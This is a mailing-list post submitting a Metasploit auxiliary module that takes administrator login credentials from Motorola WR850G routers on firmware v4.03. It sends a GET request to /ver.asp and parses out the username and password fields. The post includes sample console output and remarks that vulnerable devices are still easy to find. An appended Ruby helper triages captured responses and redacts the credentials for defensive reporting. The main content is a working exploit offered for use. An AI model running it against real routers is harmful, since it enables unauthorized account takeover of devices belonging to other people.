Hey guys,

I've attached a new auxiliary module for obtaining the login credentials to a
Motorola WR850G router with firmware v4.03.  I just put it under admin, but
there is probably a better place for it.


msf auxiliary(wr850g_cred) > run
[*] Found username "xxxx" and password "yyyy"
[*] Auxiliary module execution completed


msf > info admin/wr850g_cred

       Name: Motorola WR850G v4.03 Credentials
    Version: 1

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  80               yes       The target port

Description:
  Login credentials to the Motorola WR850G router with firmware v4.03
  can be obtained via a simple GET request if issued while the
  administrator is logged in. A lot more information is available
  through this request, but you can get it all and more after logging
  in.


This was disclosed back in Sep 2004, but I still easily found one lying around
with this firmware.

Thanks,
Kris Katterjohn


require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::Tcp

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Motorola WR850G v4.03 Credentials',
                        'Description'    => %q{
                                Login credentials to the Motorola WR850G router with
                                firmware v4.03 can be obtained via a simple GET request
                                if issued while the administrator is logged in.  A lot
                                more information is available through this request, but
                                you can get it all and more after logging in.
                        },
                        'Author'         => 'Kris Katterjohn <[EMAIL PROTECTED]>',
                        'License'        => MSF_LICENSE,
                        'Version'        => '1',
                        'References'     =>
                                [ [ 'URL', 'http://seclists.org/bugtraq/2004/Sep/0339.html'] ],
                        'DisclosureDate' => 'Sep 24 2004'))

                register_options([Opt::RPORT(80)])
        end

        def run
                connect

                sock.put("GET /ver.asp HTTP/1.0\r\n\r\n")
                response = sock.get

                disconnect

                if response.nil? or response.empty?
                        print_status("No response from server")
                        return
                end

                # 302 Redirect
                if response.split(/\r\n/)[0] !~ /200 Ok/
                        print_status("Administrator not logged in")
                        return
                end

                user = $1 if response.match("http_username=([^\n]*)<br>")
                pass = $1 if response.match("http_passwd=([^\n]*)<br>")

                print_status("Found username \"#{user}\" and password \"#{pass}\"") if user and pass
        end
end
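
The following is an added example, not part of the original post or of the Metasploit code base: an offline triage helper that classifies captured HTTP responses for the /ver.asp exposure described above and redacts the credential values before a finding is shared. The field names http_username and http_passwd and the status texts come from the module; the function names, constants and sample responses are hypothetical and constructed for illustration.

```ruby
# Added example: offline triage of captured /ver.asp responses.
# Function, constant and sample names are hypothetical; only the field
# names and the 200/302 behaviour are taken from the module above.

LEAK_FIELDS = %w[http_username http_passwd].freeze

# Constructed sample responses (placeholder values, not real data).
SAMPLE_LEAK = "HTTP/1.0 200 Ok\r\nContent-Type: text/html\r\n\r\n" \
              "http_username=exampleuser<br>\nhttp_passwd=examplepass<br>\n"
SAMPLE_REDIRECT = "HTTP/1.0 302 Redirect\r\nLocation: /\r\n\r\n"

# Returns { verdict: Symbol, fields: [credential field names present] }
#   :no_response - nothing was captured
#   :not_exposed - non-200 status (the module reads this as "admin not logged in")
#   :exposed     - 200 and at least one credential field in the body
#   :clean       - 200 but no credential fields in the body
def classify_ver_asp(raw)
  return { verdict: :no_response, fields: [] } if raw.nil? || raw.strip.empty?

  head, body = raw.split(/\r?\n\r?\n/, 2)
  status_line = head.lines.first.to_s.strip
  # Match on the status code, not the exact "200 Ok" text, so a change in
  # the reason phrase does not hide a finding.
  unless status_line =~ %r{\AHTTP/\d\.\d\s+200\b}
    return { verdict: :not_exposed, fields: [] }
  end

  found = LEAK_FIELDS.select { |f| body.to_s =~ /#{Regexp.escape(f)}=[^\n<]*/ }
  { verdict: found.empty? ? :clean : :exposed, fields: found }
end

# Replace credential values so the capture can be attached to a ticket.
def redact(raw)
  raw.gsub(/\b(#{LEAK_FIELDS.join('|')})=[^\n<]*/) { "#{$1}=[REDACTED]" }
end

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_LEAK, SAMPLE_REDIRECT, nil].each do |capture|
    puts classify_ver_asp(capture).inspect
  end
  puts redact(SAMPLE_LEAK)
end
```

Unlike the module, which prints nothing when only one of the two fields is present, this reports whichever fields appear, so a partial exposure still shows up as a finding.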
